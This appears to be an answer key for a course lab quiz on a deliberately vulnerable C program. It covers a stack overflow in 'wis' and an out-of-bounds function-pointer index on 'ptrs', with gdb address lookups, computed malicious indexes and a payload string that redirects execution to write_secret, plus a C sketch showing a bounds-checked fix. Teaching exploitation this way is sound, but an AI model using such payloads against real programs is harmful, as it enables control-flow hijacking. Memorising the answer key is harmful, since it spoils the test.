This document contains questions and answers about vulnerabilities in a program, including:
- A stack-based buffer overflow in a variable called "wis" that can be triggered on line 62.
- A non-stack allocated buffer "ptrs" that can be indexed outside its bounds, triggered on line 101.
- Ways to manipulate the "ptrs" buffer to execute other functions in memory, including "pat_on_back" and "write_secret".
- The number of bytes needed to overwrite the return address of "put_wisdom" to redirect execution to "write_secret".
VM Bof Quiz Solutions
1. There is a stack-based overflow in the program. What is the name of the stack-allocated variable that contains the overflowed buffer?
   ans: wis

2. Consider the buffer you just identified: Running what line of code will overflow the buffer?
   ans: 62

3. There is another vulnerability, not dependent at all on the first, involving a non-stack allocated buffer that can be indexed outside its bounds. What variable contains this buffer?
   ans: ptrs

4. Consider the buffer you just identified: Running what line of code overflows the buffer?
   ans: 101

5. What is the address of buf?
   ans: 0xbfff f130

6. What is the address of ptrs?
   ans: 0x0804 a0d4

7. What is the address of write_secret?
   ans: 0x0804 8534

8. What is the address of p local to main?
   ans: 0xbfff f534

9. What input do you provide so that ptrs[s] reads/executes the contents of variable p instead of a function in the ptrs buffer? If ok, you will execute the pat_on_back function. Enter your answer as an unsigned integer.
   ans: (p-ptrs)/4 is

       print /x (0xbffff534 - 0x804a0d4)/4
       0x2dfed518 or 771675416

10. What do you enter so that ptrs[s] reads (and then tries to execute) starting from the 65th byte in buf, i.e. the location at buf[64]? Enter your answer as an unsigned integer.
    ans:

        (gdb) print /x &buf[64]
        $6 = 0xbffff170
        (gdb) print /d (int*)&buf[64]-(int *)&ptrs
        $14 = 771675175

    771675175

11. What do you replace \xEE\xEE\xEE\xEE with to call write_secret?
    ans:

        (gdb) print &write_secret
        $7 = (void (*) (void)) 0x8048534 <write_secret>

        771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x34\x85\x04\x08

12. Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return address of that function, replacing it with the address of write_secret. How many bytes do you need to enter prior to the address of write_secret?
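
Questions 9 and 10 work only because ptrs[s] is read with no bounds check on s. The C sketch below is an added example, not the quiz program's source: it computes where an unchecked index would load from, using the addresses given in the answers, and sets that beside a bounds-checked dispatch. The table contents, the handler names and the 4-byte pointer size are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Addresses are the quiz answers; a 32-bit target with 4-byte pointers is assumed. */
#define PTRS_ADDR 0x0804a0d4u
#define PTR_SIZE  4u

typedef int (*handler_fn)(void);

/* Hypothetical handlers standing in for the program's menu functions. */
static int handler_get(void) { return 1; }
static int handler_put(void) { return 2; }

/* Constructed table; slot 0 is left empty on purpose. */
static handler_fn table[] = { NULL, handler_get, handler_put };
#define TABLE_LEN (sizeof table / sizeof table[0])

/* Address an unchecked ptrs[s] would load from, with 32-bit wraparound.
 * Pure arithmetic: nothing is dereferenced. */
uint32_t unchecked_slot_addr(uint32_t base, uint32_t s)
{
    return (uint32_t)(base + (uint32_t)(s * PTR_SIZE));
}

/* Hardened dispatch: reject out-of-range indexes and empty slots
 * before the indirect call. Returns -1 on rejection. */
int dispatch_checked(unsigned long s)
{
    if (s >= TABLE_LEN || table[s] == NULL)
        return -1;
    return table[s]();
}

int main(void)
{
    const uint32_t inputs[] = { 1u, 2u, 771675416u, 771675175u };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("s=%u  unchecked load from 0x%08x  checked dispatch -> %d\n",
               (unsigned)inputs[i],
               (unsigned)unchecked_slot_addr(PTRS_ADDR, inputs[i]),
               dispatch_checked(inputs[i]));
    }
    return 0;
}
```

With the check in place, both quiz indexes are rejected before any pointer is loaded, so the contents of p and buf never reach the indirect call.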